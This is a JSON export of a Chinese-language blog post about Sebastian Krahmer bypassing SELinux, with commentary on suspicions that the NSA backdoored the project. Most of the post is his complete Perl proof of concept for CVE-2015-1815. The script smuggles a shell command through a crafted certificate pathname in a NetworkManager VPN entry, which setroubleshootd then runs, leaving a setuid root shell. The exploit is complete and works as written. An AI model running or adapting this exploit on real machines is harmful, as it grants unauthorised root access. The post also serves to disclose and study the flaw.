“GNU\/Linux\u5382\u5546SuSE\u7684\u5b89\u5168\u7814\u7a76\u4eba\u5458Sebastian Krahmer\u6210\u529f\u7684\u7ed5\u8fc7\u4e86SELinux\u7684\u767d\u540d\u5355\u89c4\u5219\uff0cSebastian\u5206\u6790\u4e86\u6f0f\u6d1e\u5229\u7528\u7684\u65b9\u6cd5\u5e76\u4e14\u516c\u5f00\u4e86PoC\uff0c\u7531\u4e8e\u5728targeted\u89c4\u5219\u7684\u60c5\u51b5\u4e0b\uff0c\u793e\u533a\u7684\u7ef4\u62a4\u4eba\u5458\u90fd\u5047\u8bbe\u662f\u5b89\u5168\u7684\u6240\u4ee5\u4f1a\u7ed9\u4e00\u4e9b\u7684\u7a0b\u5e8froot\u6743\u9650\u8fd0\u884c\uff0c\u53ef\u80fd\u8fd9\u6b63\u662fNSA\u6240\u5e0c\u671b\u770b\u5230\u7684;-)
\n\u8457\u540d\u7684MAC(\u5f3a\u5236\u8bbf\u95ee\u63a7\u5236\uff09\u5f00\u6e90\u5b9e\u73b0SELinux\u662f\u7531NSA(\u7f8e\u56fd\u56fd\u5bb6\u5b89\u5168\u5c40\uff09\u4e8e1990\u5e74\u4ee3\u672b\u53d1\u8d77\u7684\u9879\u76ee\uff0c\u4e8e2000\u5e74\u4ee5GPL\u81ea\u7531\u8f6f\u4ef6\u8bb8\u53ef\u8bc1\u5f00\u653e\u6e90\u4ee3\u7801\uff0c2003\u5e74\u5408\u5e76\u5230Linux\u5185\u6838\u4e2d\uff0c\u8fc7\u53bb10\u5e74\u4e2d\u5173\u4e8e\u662f\u5426NSA\u5728\u5176\u4e2d\u653e\u540e\u95e8\u7684\u4e89\u8bba\u6ca1\u6709\u505c\u8fc7\uff0c\u4e00\u4e9b\u4eba\u8ba4\u4e3a\u5e94\u8be5\u4fe1\u4efbSELinux\uff0c\u56e0\u4e3a\u5b83\u662f\u4ee5GPL\u81ea\u7531\u8f6f\u4ef6\u8bb8\u53ef\u8bc1\u516c\u5f00\u7684\u6e90\u4ee3\u7801\uff0c\u4e5f\u6709\u4eba\u8ba4\u4e3a\u5b83\u662fNSA\u53c2\u4e0e\u8fc7\u7684\u9879\u76ee\uff0c\u6240\u4ee5\u4e0d\u5e94\u8be5\u4fe1\u4efb\u30022013\u5e74Snowden\u66dd\u5149\u68f1\u955c\u540e\u66f4\u591a\u7684\u4eba\u6781\u5ea6\u7684\u4e0d\u4fe1\u4efbNSA\uff0c\u8ba4\u4e3aNSA\u6709\u5bf9Android\u4ee3\u7801\u690d\u5165\u540e\u95e8\u7684\u524d\u79d1\uff0c\u6240\u4ee5\u5e94\u8be5\u6000\u7591\u6240\u6709NSA\u79ef\u6781\u53c2\u4e0e\u7684\u9879\u76ee\u5305\u62ecSELinux\u3002\u76ee\u524dMAC\u7684\u5f00\u6e90\u5b9e\u73b0\u91cc\uff0cSELinux\u4e3b\u8981\u7531RedHat\/CentOS\/Fedora\u793e\u533a\u7ef4\u62a4\uff0cApparmor\u4e3b\u8981\u7531OpenSuSE\/Ubuntu\u793e\u533a\u7ef4\u62a4\uff0c\u800c\u4ee5\u7eb5\u6df1\u9632\u5fa1\u8457\u79f0\u7684PaX\/Grsecurity\u5230\u76ee\u524d\u672a\u77e5\u56e0\u4e3a\u5382\u5546\u5229\u76ca\u4ee5\u53ca\u793e\u533a\u653f\u6cbb\u7b49\u5404\u79cd\u539f\u56e0\uff0c\u867d\u7136\u88ab\u8bf8\u591a\u64cd\u4f5c\u7cfb\u7edf\u6284\u88ad( Linux\/Windows\/OSX)\uff0c\u4f46\u4e00\u76f4\u672a\u80fd\u8fdb\u5165Linux\u4e3b\u5e72\u4ee3\u7801\u3002”<\/p>\n
https:\/\/github.com\/stealth\/troubleshooter<\/p>\n
#!\/usr\/bin\/perl\r\n\r\n# Fedora21 setroubleshootd local root PoC (CVE-2015-1815)\r\n#\r\n# requires polkit authorization to add\/mod VPN connections\r\n# to NetworkManager (default on desktop user)\r\n#\r\n# I say: lulz!\r\n#\r\n# (C) 2015 Sebastian Krahmer\r\n#\r\n#\r\n# create a pathname that setroubleshootd will eventually\r\n# query sh -c { rpm -qf ... with, fucking up ' escaping. So the\r\n# embedded pathname is then evaluated as command\r\n#\r\n# There goes your NSA-grade SELinux security.\r\n\r\n#$command = \"id|logger\";\r\n\r\n# full blown rootshell to disable SELinux\r\n$command=\"cd var;cd lib;cd setroubleshoot;cat \\$SHELL > sh;chmod 04755 sh\";\r\n$boomsh = \"\/var\/lib\/setroubleshoot\/sh\";\r\n\r\n$file = \"\/tmp\/7350.pem';$command;echo '\";\r\nopen(O, \">\", $file) or die $!;\r\nclose O;\r\n\r\n# add connection\r\nsystem(\"nmcli c add type vpn ifname FOOBAR vpn-type openvpn\");\r\nopen(O,\"|nmcli c edit vpn-FOOBAR\") or die $!;\r\n\r\nprint O \"set vpn.data ca = \/tmp\/7350.pem';$command;echo ', password-flags = 1, connection-type = password, remote = 1.2.3.4, username = FOOBAR\\n\";\r\nprint O \"set vpn.secrets password=1\\nsave\\nquit\\n\";\r\nclose(O);\r\n\r\nprint \"[*] Triggering vulnerability for boomsh ...\\n\";\r\n\r\nwhile (((stat($boomsh))[2] & 04000) != 04000) {\r\n\tsystem(\"nmcli c up vpn-FOOBAR\");\r\n\tsleep(10);\r\n}\r\n\r\nprint \"\\n[!] Found boomsh mode 04755! Domains dont contain!\\n\";\r\nexec($boomsh, \"-p\");<\/pre>\n","protected":false},"excerpt":{"rendered":"“GNU\/Linux\u5382\u5546SuSE\u7684\u5b89\u5168…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3],"tags":[179],"_links":{"self":[{"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=\/wp\/v2\/posts\/659"}],"collection":[{"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=659"}],"version-history":[{"count":2,"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=\/wp\/v2\/posts\/659\/revisions"}],"predecessor-version":[{"id":661,"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=\/wp\/v2\/posts\/659\/revisions\/661"}],"wp:attachment":[{"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=659"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=659"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=659"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}